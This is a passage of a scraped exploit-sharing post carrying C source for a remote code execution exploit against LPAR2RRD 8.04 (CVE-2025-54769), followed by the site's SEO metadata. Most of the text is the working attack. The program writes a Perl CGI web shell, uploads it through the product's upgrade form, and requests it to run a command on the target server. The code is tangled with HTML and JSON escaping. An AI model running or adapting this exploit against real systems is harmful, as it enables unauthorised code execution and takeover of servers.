\n
#define FULL 2500<\/p>\n void sleepAssembly()
\n
{
\n
struct timespec s ;
\n
s.tv_sec = 0;
\n
s.tv_nsec = 500000000;<\/p>\n
__asm__ volatile
\n
(
\n
“mov $35, %%rax\\n\\t”
\n
“xor %%rsi, %%rsi\\n\\t”
\n
“syscall\\n\\t”
\n
:
\n
: “D” (&s)
\n
: “rax”,
\n
“rsi”,
\n
“memory”
\n
);
\n
}
\n
void syscallLinux()
\n
{
\n
__asm__ volatile
\n
(
\n
“mov $0x3C, %%rax\\n\\t”
\n
“xor %%rdi, %%rdi\\n\\t”
\n
“syscall\\n\\t”
\n
:
\n
:
\n
:”rax”, “rdi”
\n
);
\n
}
\n
int fileS = 0;
\n
int useCookies = 0;
\n
int verboseMode = 0;
\n
const char *cookies;
\n
const char *ip = NULL;
\n
int portService = 0;
\n
int port = 0;
\n
int protocolS = 0;
\n
const char *protocol = NULL;
\n
int CreateFilePerl()
\n
{
\n
FILE *fileP = fopen(“users.pl”, “w”);
\n
if (fileP == NULL)
\n
{
\n
printf(“\\e[1;31m[-] Error Create File (users.pl)\\e[0m\\n”);
\n
syscallLinux();
\n
return 0;
\n
}
\n
printf(“[+] Create File Successfully\\n”);
\n
char payloadContent[7000];
\n
int payload = snprintf(payloadContent,
\n
sizeof(payloadContent),
\n
“#!\/usr\/bin\/perl\\n”
\n
“use strict;\\n”
\n
“use warnings;\\n”
\n
“use CGI;\\n”
\n
“my $q = CGI->new;\\n”
\n
“my %%PAR = map { $_ => scalar $q->param($_) } $q->param;\\n”
\n
“if ( $PAR{cmd} && $PAR{cmd} eq \\”commandLinux\\”)\\n”
\n
“{\\n”
\n
“\\tprint \\”Content-type: text\/html\\\\n\\\\n\\”;\\n”
\n
“\\tmy $commandW = qx(\/usr\/bin\/whoami 2>&1);\\n”
\n
“\\tprint $commandW;\\n”
\n
“}\\n”
\n
);
\n
if (payload < 0 || (size_t)payload >= sizeof(payloadContent))
\n
{
\n
fprintf(stderr,
\n
“\\e[1;31m[-] Perl payload truncated or formatting error\\e[0m\\n”);
\n
syscallLinux();
\n
}<\/p>\n
size_t e = strlen(payloadContent);
\n
unsigned long writeLen = fwrite(payloadContent,
\n
1, strlen(payloadContent),
\n
fileP);
\n
if (writeLen != e)
\n
{
\n
printf(“\\e[1;31m[-] Error Fwrite Payload in File Perl\\e[0m\\n”);
\n
syscallLinux();
\n
return 0;
\n
}
\n
printf(“\\e[1;36m[+] Write Payload in File Successfully\\e[0m\\n”);
\n
fclose(fileP);
\n
return 1;
\n
}
\n
const char *resultCommand[] =
\n
{
\n
“root”,
\n
“admin”,
\n
“user”,
\n
“ssh”,
\n
“\/home\/”,
\n
NULL
\n
};<\/p>\n
struct Mem
\n
{
\n
char *buffer;
\n
size_t len;
\n
};
\n
size_t write_cb(void *ptr,
\n
size_t size,
\n
size_t nmemb,
\n
void *userdata)
\n
{
\n
size_t total = size * nmemb;
\n
struct Mem *m = (struct Mem *)userdata;
\n
char *tmp = realloc(m->buffer, m->len + total + 1);
\n
if (tmp == NULL)
\n
{
\n
fprintf(stderr, “\\e[1;31m[-] Failed to allocate memory!\\e[0m\\n”);
\n
syscallLinux();
\n
}
\n
m->buffer = tmp;
\n
memcpy(&(m->buffer[m->len]), ptr, total);
\n
m->len += total;
\n
m->buffer[m->len] = ‘\\0’;
\n
return total;
\n
}
\n
void getRequest(CURL *curl, const char *targetIP)
\n
{
\n
struct Mem responseGet ;
\n
responseGet.buffer = NULL;
\n
responseGet.len = 0;
\n
CURLcode codeLib;
\n
char full[FULL];
\n
const char *proto = protocolS ? protocol : “https”;
\n
int prt = portService
\n
? port
\n
: (strcmp(proto, “http”) == 0 ? 80 : 443);
\n
int n = snprintf(full, sizeof(full),
\n
“%s:\/\/%s:%d\/lpar2rrd-cgi\/users.sh?cmd=commandLinux”,
\n
proto, targetIP, prt);
\n
if (n < 0 || (size_t)n >= sizeof(full))
\n
{
\n
fprintf(stderr, “\\e[1;31m[-] URL buffer too small\\e[0m\\n”);
\n
syscallLinux();
\n
}<\/p>\n
curl_easy_setopt(curl, CURLOPT_URL, full);
\n
curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
\n
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb);
\n
curl_easy_setopt(curl, CURLOPT_WRITEDATA, &responseGet);
\n
curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L);
\n
sleepAssembly();
\n
curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L);<\/p>\n
if (useCookies)
\n
{
\n
curl_easy_setopt(curl,
\n
CURLOPT_COOKIEFILE,
\n
cookies);
\n
curl_easy_setopt(curl,
\n
CURLOPT_COOKIEJAR,
\n
cookies);
\n
}
\n
if (verboseMode)
\n
{
\n
printf(“\\e[1;35m——————————————[Verbose Curl]——————————————\\e[0m\\n”);
\n
curl_easy_setopt(curl,
\n
CURLOPT_VERBOSE,
\n
1L);
\n
}<\/p>\n
printf(“\\e[1;37m[+] GET URL: %s\\e[0m\\n”,
\n
full);
\n
struct curl_slist *headers = NULL;
\n
headers = curl_slist_append(headers ,
\n
“Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8”);
\n
headers = curl_slist_append(headers,
\n
“Accept-Language: en-US,en;q=0.5”);
\n
headers = curl_slist_append(headers,
\n
“Accept-Encoding: gzip, deflate, br”);
\n
headers = curl_slist_append(headers,
\n
“Upgrade-Insecure-Requests: 1”);
\n
headers = curl_slist_append(headers,
\n
“Sec-Fetch-Dest: document”);
\n
headers = curl_slist_append(headers,
\n
“Sec-Fetch-Mode: navigate”);
\n
headers = curl_slist_append(headers,
\n
“Priority: u=0, i”);
\n
headers = curl_slist_append(headers,
\n
“Pragma: no-cache”);
\n
headers = curl_slist_append(headers,
\n
“Cache-Control: no-cache”);
\n
headers = curl_slist_append(headers,
\n
“Connection: keep-alive”);
\n
curl_easy_setopt(curl,
\n
CURLOPT_HTTPHEADER,
\n
headers);
\n
codeLib = curl_easy_perform(curl);
\n
curl_slist_free_all(headers);
\n
if (codeLib == CURLE_OK)
\n
{
\n
printf(“\\e[1;35m=================================================== [GET] ===================================================\\e[0m\\n”);
\n
long codeH = 0;
\n
curl_easy_getinfo(curl,
\n
CURLINFO_RESPONSE_CODE,
\n
&codeH);<\/p>\n
printf(“\\e[1;36m[+] Request GET sent successfully\\e[0m\\n”);
\n
printf(“\\e[1;32m[+] Http Code -> %ld\\e[0m\\n”, codeH);
\n
if (responseGet.buffer)
\n
{
\n
if (verboseMode)
\n
{
\n
printf(“\\e[1;35m=================================================== [RESPONSE] ===================================================\\e[0m\\n”);<\/p>\n
printf(“%s\\n”, responseGet.buffer);
\n
printf(“\\e[1;35m===================================================================================================================\\e[0m\\n”);
\n
}
\n
}<\/p>\n
if (codeH >= 200 && codeH < 300) \n
{
\n
printf(“\\e[1;36m[+] Positive Http Code (200 < 300) : %ld\\e[0m\\n\",codeH);\n
printf(“\\e[1;32m[+] Http Code -> %ld\\e[0m\\n”, codeH);
\n
if (responseGet.buffer)
\n
{
\n
printf(“\\e[1;35m=================================================== [RESPONSE] ===================================================\\n”);
\n
printf(“%s\\n”, responseGet.buffer);
\n
printf(“\\e[1;32m[+] Len Response : %zu\\e[0m\\n”,
\n
responseGet.len);
\n
printf(“\\e[1;35m===================================================================================================================\\n”);
\n
for (int j = 0; resultCommand[j]; j++)
\n
{
\n
if (strstr(responseGet.buffer, resultCommand[j]))
\n
{
\n
printf(“\\e[1;34m[+] Word Found In Response.\\e[0m\\n”);
\n
printf(“\\e[1;34m[+] Word : %s\\e[0m\\n”,
\n
resultCommand[j]);
\n
printf(“\\e[1;36m[+] The server is experiencing a vulnerability (CVE-2025-54769)\\e[0m\\n”);
\n
}
\n
else
\n
{
\n
if (verboseMode)
\n
{
\n
printf(“\\e[1;31m[-] Not Found Word In Response : %s\\e[0m\\n”,
\n
resultCommand[j]);
\n
}
\n
else
\n
{
\n
continue;
\n
}<\/p>\n
}<\/p>\n
}
\n
}
\n
else
\n
{
\n
printf(“\\e[1;31m[-] Response Server Is NULL !\\e[0m\\n”);
\n
if (verboseMode)
\n
{
\n
printf(“\\e[1;31m[-] Exit Syscall\\e[0m\\n”);
\n
}
\n
}
\n
}
\n
else
\n
{
\n
printf(“\\e[1;31m[-] HTTP Code Not Range Positive (200 < 300) : %ld\\e[0m\\n\", codeH);\n
if (verboseMode)
\n
{
\n
if (responseGet.buffer)
\n
{
\n
printf(“\\e[1;35m\\n=========================================== [Response] ===========================================\\e[0m\\n”);
\n
printf(“%s\\n”, responseGet.buffer);
\n
printf(“\\e[1;32m[+] Len Response : %zu\\n”,responseGet.len);
\n
printf(“\\e[1;35m\\n=============================================================================================\\e[0m\\n”);
\n
}
\n
}
\n
}
\n
}
\n
else
\n
{
\n
fprintf(stderr,”\\e[1;31m[-] Error Send Request\\e[0m\\n”);
\n
fprintf(stderr,”\\e[1;31m[-] Error : %s\\e[0m\\n”, curl_easy_strerror(codeLib));
\n
syscallLinux();
\n
}<\/p>\n
free(responseGet.buffer);
\n
responseGet.buffer = NULL;
\n
responseGet.len = 0;
\n
curl_easy_cleanup(curl);
\n
}<\/p>\n
void remoteCode(const char *ipS)
\n
{<\/p>\n
CURL *curl = curl_easy_init();
\n
struct Mem response;
\n
response.buffer = NULL;
\n
response.len = 0;
\n
CURLcode codeLibCurl;
\n
if (verboseMode)
\n
{
\n
printf(“\\e[1;35m================================== [Value Response] ==================================\\n”);
\n
printf(“\\e[1;32m[+] Response Buffer -> %s\\e[0m\\n”, response.buffer);
\n
printf(“\\e[1;32m[+] Response Len -> %zu\\e[0m\\n”, response.len);
\n
printf(“\\e[1;35m=======================================================================================\\n”);
\n
}
\n
if (!curl)
\n
{
\n
fprintf(stderr, “\\e[1;31m[-] Failed to init CURL\\e[0m\\n”);
\n
syscallLinux();
\n
}
\n
char full[FULL];
\n
const char *proto = protocolS ? protocol : “https”;
\n
int prt = portService
\n
? port
\n
: (strcmp(proto, “http”) == 0 ? 80 : 443);
\n
int n = snprintf(full,
\n
sizeof(full),
\n
“%s:\/\/%s:%d\/lpar2rrd-cgi\/upgrade.sh”,
\n
proto, ipS, prt);
\n
if (n < 0 || (size_t)n >= sizeof(full))
\n
{
\n
fprintf(stderr, “\\e[1;31m[-] URL buffer too small\\e[0m\\n”);
\n
syscallLinux();
\n
}<\/p>\n
if (!CreateFilePerl())
\n
{
\n
fprintf(stderr,
\n
“\\e[1;31m[-] Failed to create File users.pl\\e[0m\\n”);
\n
syscallLinux();
\n
}<\/p>\n
printf(“\\e[1;34m[+] Uploading %s to %s\\n”, “users.pl”, full);<\/p>\n
curl_mime *form = curl_mime_init(curl);
\n
curl_mimepart *field = curl_mime_addpart(form);
\n
curl_mime_name(field,
\n
“upgfile”);
\n
curl_mime_filedata(field,
\n
“users.pl”);
\n
curl_mime_filename(field,
\n
“users.pl”);
\n
curl_mime_type(field,
\n
“application\/x-perl”);
\n
curl_easy_setopt(curl,
\n
CURLOPT_URL,
\n
full);
\n
curl_easy_setopt(curl,
\n
CURLOPT_POST,
\n
1L);
\n
curl_easy_setopt(curl,
\n
CURLOPT_MIMEPOST, form);
\n
curl_easy_setopt(curl,
\n
CURLOPT_WRITEFUNCTION,
\n
write_cb);
\n
curl_easy_setopt(curl,
\n
CURLOPT_WRITEDATA, &response);
\n
curl_easy_setopt(curl,
\n
CURLOPT_FOLLOWLOCATION,
\n
1L);
\n
curl_easy_setopt(curl,
\n
CURLOPT_CONNECTTIMEOUT,
\n
5L);
\n
sleepAssembly();
\n
curl_easy_setopt(curl,
\n
CURLOPT_TIMEOUT,
\n
10L);<\/p>\n
if (useCookies)
\n
{
\n
curl_easy_setopt(curl,
\n
CURLOPT_COOKIEFILE,
\n
cookies);
\n
curl_easy_setopt(curl,
\n
CURLOPT_COOKIEJAR,
\n
cookies);
\n
}
\n
if (verboseMode)
\n
{
\n
printf(“\\e[1;35m——————————————[Verbose Curl]——————————————\\e[0m\\n”);
\n
curl_easy_setopt(curl,
\n
CURLOPT_VERBOSE,
\n
1L);
\n
}<\/p>\n
struct curl_slist *headers = NULL;
\n
char host[128];
\n
int lenIp = snprintf(host ,
\n
sizeof(host),
\n
“Host: %s:%d”,
\n
ipS, prt);
\n
if (lenIp < 0 || (size_t)lenIp >= sizeof(host))
\n
{
\n
printf(“\\e[1;31m[-] IP Address is Long !\\e[0m\\n”);
\n
syscallLinux();
\n
}
\n
headers = curl_slist_append(headers,
\n
“Accept: *\/*”);
\n
headers = curl_slist_append(headers,
\n
“Accept-Language: en-US,en;q=0.5”);
\n
headers = curl_slist_append(headers,
\n
“Accept-Encoding: gzip, deflate, br”);
\n
headers = curl_slist_append(headers,
\n
“X-Requested-With: XMLHttpRequest”);
\n
headers = curl_slist_append(headers,
\n
“Connection: keep-alive”);
\n
headers = curl_slist_append(headers,
\n
“Priority: u=0”);
\n
headers = curl_slist_append(headers, “Authorization: “);
\n
headers = curl_slist_append(headers, “Referer: http:\/\/127.0.0.1\/lpar2rrd\/index.html?amenu=upgrade&tab=0”);
\n
headers = curl_slist_append(headers ,
\n
host);
\n
void *m = memset(host , 0, sizeof(host));
\n
if (m == NULL)
\n
{
\n
fprintf(stderr,”\\e[1;31m[-] Error Clean HOST IP (memset() == NULL)\\e[0m\\n”);
\n
syscallLinux();
\n
}
\n
int lenO = snprintf(host ,
\n
sizeof(host),
\n
“Origin: https:\/\/%s:%d”,
\n
ipS, prt);
\n
if (lenO < 0 || (size_t)lenO >= sizeof(host))
\n
{
\n
syscallLinux();
\n
}
\n
headers = curl_slist_append(headers,
\n
host);
\n
curl_easy_setopt(curl,
\n
CURLOPT_HTTPHEADER,
\n
headers);<\/p>\n codeLibCurl = curl_easy_perform(curl);
\n
curl_mime_free(form);
\n
curl_slist_free_all(headers);<\/p>\n
if (codeLibCurl != CURLE_OK)
\n
{
\n
fprintf(stderr, “\\e[1;31m[-] curl error: %s\\e[0m\\n”,
\n
curl_easy_strerror(codeLibCurl));
\n
syscallLinux();
\n
}
\n
long httpCode = 0;
\n
curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE,
\n
&httpCode);
\n
printf(“\\e[1;36m[+] Protocol : %s\\e[0m\\n”, protocol);
\n
printf(“\\e[1;36m[+] Port : %d\\e[0m\\n”, port);
\n
printf(“\\e[1;32m[+] Http Code -> %ld\\e[0m\\n”, httpCode);;
\n
if (httpCode >= 200 && httpCode < 300)\n
{
\n
printf(“\\e[1;36m[+] Positive Http Code (200 < 300) : %ld\\e[0m\\n\",httpCode);\n
if (response.buffer)
\n
{
\n
printf(“\\e[1;35m\\n=========================================== [Response] ===========================================\\e[0m\\n”);
\n
printf(“%s\\n”, response.buffer);
\n
printf(“\\e[1;32m [+] Len Response : %zu\\e[0m\\n”,response.len);
\n
printf(“\\e[1;35m\\n=============================================================================================\\e[0m\\n”);
\n
if (strstr(response.buffer, “This file doesn’t look like the upgrade package”))
\n
{
\n
printf(“\\e[1;34m[+] Sentence found in reply.\\e[0m\\n”);
\n
printf(“\\e[1;34m[+] Sentence : This file doesn’t look like the upgrade package\\e[0m\\n”);
\n
printf(“\\e[1;34m[+] Exploitation is being completed…\\e[0m\\n”);
\n
getRequest(curl, ipS);
\n
}
\n
}
\n
else
\n
{
\n
fprintf(stderr,”\\e[1;31m[-] Response Buffer is NULL\\e[0m\\n”);
\n
fprintf(stderr,”\\e[1;31m[-] Please Check Your Connection Or Waf\\e[0m\\n”);
\n
if (verboseMode)
\n
{
\n
fprintf(stderr,”\\e[1;31m[-] Exit Syscall…\\e[0m\\n”);
\n
}
\n
syscallLinux();
\n
}
\n
}
\n
else
\n
{
\n
printf(“\\e[1;31m[-] HTTP Code Not Range Positive (200 < 300) : %ld\\e[0m\\n\", httpCode);\n
if (verboseMode)
\n
{
\n
if (response.buffer)
\n
{
\n
printf(“\\e[1;35m\\n=========================================== [Response] ===========================================\\e[0m\\n”);
\n
printf(“%s\\n”, response.buffer);
\n
printf(“\\e[1;32m[-] Len Response : %zu\\n”,response.len);
\n
printf(“\\e[1;35m\\n=============================================================================================\\e[0m\\n”);
\n
}
\n
}
\n
}<\/p>\n
free(response.buffer);
\n
response.buffer = NULL;
\n
response.len = 0;
\n
curl_easy_cleanup(curl);
\n
}<\/p>\n
int main(int argc,
\n
const char **argv)
\n
{
\n
printf(
\n
“\\e[1;31m”
\n
“\u2584\u2596\u2596\u2596\u2584\u2596 \u2584\u2596\u2584\u2596\u2584\u2596\u2584\u2596 \u2584\u2596\u2596\u2596\u2584\u2596\u2584\u2596\u2584\u2596 \\n”
\n
“\u258c \u258c\u258c\u2599\u2596\u2584\u2596\u2584\u258c\u259b\u258c\u2584\u258c\u2599\u2596\u2584\u2596\u2599\u2596\u2599\u258c \u258c\u2599\u2596\u2599\u258c \\n”
\n
“\u2599\u2596\u259a\u2598\u2599\u2596 \u2599\u2596\u2588\u258c\u2599\u2596\u2584\u258c \u2584\u258c \u258c \u258c\u2599\u258c\u2584\u258c \\n”
\n
“\\e[1;37m\\t\\tByte Reaper\\n”
\n
);
\n
curl_global_init(CURL_GLOBAL_DEFAULT);
\n
printf(“\\e[1;31m————————————————————————————\\e[0m\\n”);<\/p>\n
struct argparse_option options[] =
\n
{
\n
OPT_HELP(),
\n
OPT_STRING(‘i’,
\n
“ip”,
\n
&ip,
\n
“Enter Target IP”),
\n
OPT_STRING(‘c’,
\n
“cookies”,
\n
&cookies,
\n
“cookies File”),
\n
OPT_INTEGER(‘p’,
\n
“port”,
\n
&port ,
\n
“Enter Target Port Service”),
\n
OPT_STRING(‘t’,
\n
“protocol”,
\n
&protocol,
\n
“Enter Protocol Service (http \/ https)”),
\n
OPT_BOOLEAN(‘v’,
\n
“verbose”,
\n
&verboseMode,
\n
“Verbose Mode”),
\n
OPT_END(),
\n
};
\n
struct argparse argparse;
\n
argparse_init(&argparse,
\n
options,
\n
NULL,
\n
0);<\/p>\n
argparse_parse(&argparse,
\n
argc,
\n
argv);
\n
in_addr_t q = inet_addr(ip);
\n
if (q == INADDR_NONE)
\n
{
\n
printf(“\\e[1;31m[-] Invalid Ip String !\\e[0m\\n”);
\n
syscallLinux();
\n
}
\n
if (!ip)
\n
{
\n
fprintf(stderr,”\\e[1;31m[-] Please Enter Target IP !\\e[0m\\n”);<\/p>\n
fprintf(stderr,”\\e[1;31m[-] Ex : .\/exploit -i \\e[0m\\n”);
\n
fprintf(stderr,”\\e[1;31m[-] Exit Syscall\\e[0m\\n”);
\n
syscallLinux();
\n
}
\n
if (verboseMode)
\n
{
\n
verboseMode = 1;
\n
}
\n
if (cookies)
\n
{
\n
useCookies = 1;
\n
}
\n
if (port)
\n
{
\n
portService = 1;
\n
}
\n
if (protocol)
\n
{
\n
protocolS = 1;
\n
}
\n
remoteCode(ip);
\n
curl_global_cleanup();
\n
return 0;
\n
}\n<\/div>\nView Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"Exploit Details Basic Information Exploit Title LPAR2RRD 8.04 – Remote Code Execution (RCE) Exploit ID EDB-ID:52391 Type exploitdb Published 2025-08-03T00:00:00 Modified 2025-08-03T00:00:00 CVSS Information CVSS…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,41,12,40,15,13,7,11,5],"class_list":["post-9609","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-88","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n
LPAR2RRD 8.04 - Remote Code Execution (RCE) - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=9609\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"LPAR2RRD 8.04 - Remote Code Execution (RCE) - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title LPAR2RRD 8.04 – Remote Code Execution (RCE) Exploit ID EDB-ID:52391 Type exploitdb Published 2025-08-03T00:00:00 Modified 2025-08-03T00:00:00 CVSS Information CVSS...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=9609\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-08-03T01:50:49+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9609#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9609\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"LPAR2RRD 8.04 – Remote Code Execution (RCE)\",\"datePublished\":\"2025-08-03T01:50:49+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9609\"},\"wordCount\":1902,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.8\",\"exploit\",\"exploitdb\",\"HIGH\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=9609#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9609\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9609\",\"name\":\"LPAR2RRD 8.04 - Remote Code Execution (RCE) - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-08-03T01:50:49+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9609#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=9609\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=9609#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"LPAR2RRD 8.04 – Remote Code Execution (RCE)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"LPAR2RRD 8.04 - Remote Code Execution (RCE) - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=9609","og_locale":"en_US","og_type":"article","og_title":"LPAR2RRD 8.04 - Remote Code Execution (RCE) - zero redgem","og_description":"Exploit Details Basic Information Exploit Title LPAR2RRD 8.04 – Remote Code Execution (RCE) Exploit ID EDB-ID:52391 Type exploitdb Published 2025-08-03T00:00:00 Modified 2025-08-03T00:00:00 CVSS Information CVSS...","og_url":"https:\/\/zero.redgem.net\/?p=9609","og_site_name":"zero redgem","article_published_time":"2025-08-03T01:50:49+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"9 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=9609#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=9609"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"LPAR2RRD 8.04 – Remote Code Execution (RCE)","datePublished":"2025-08-03T01:50:49+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=9609"},"wordCount":1902,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.8","exploit","exploitdb","HIGH","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=9609#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=9609","url":"https:\/\/zero.redgem.net\/?p=9609","name":"LPAR2RRD 8.04 - Remote Code Execution (RCE) - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-08-03T01:50:49+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=9609#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=9609"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=9609#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"LPAR2RRD 8.04 – Remote Code Execution (RCE)"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero 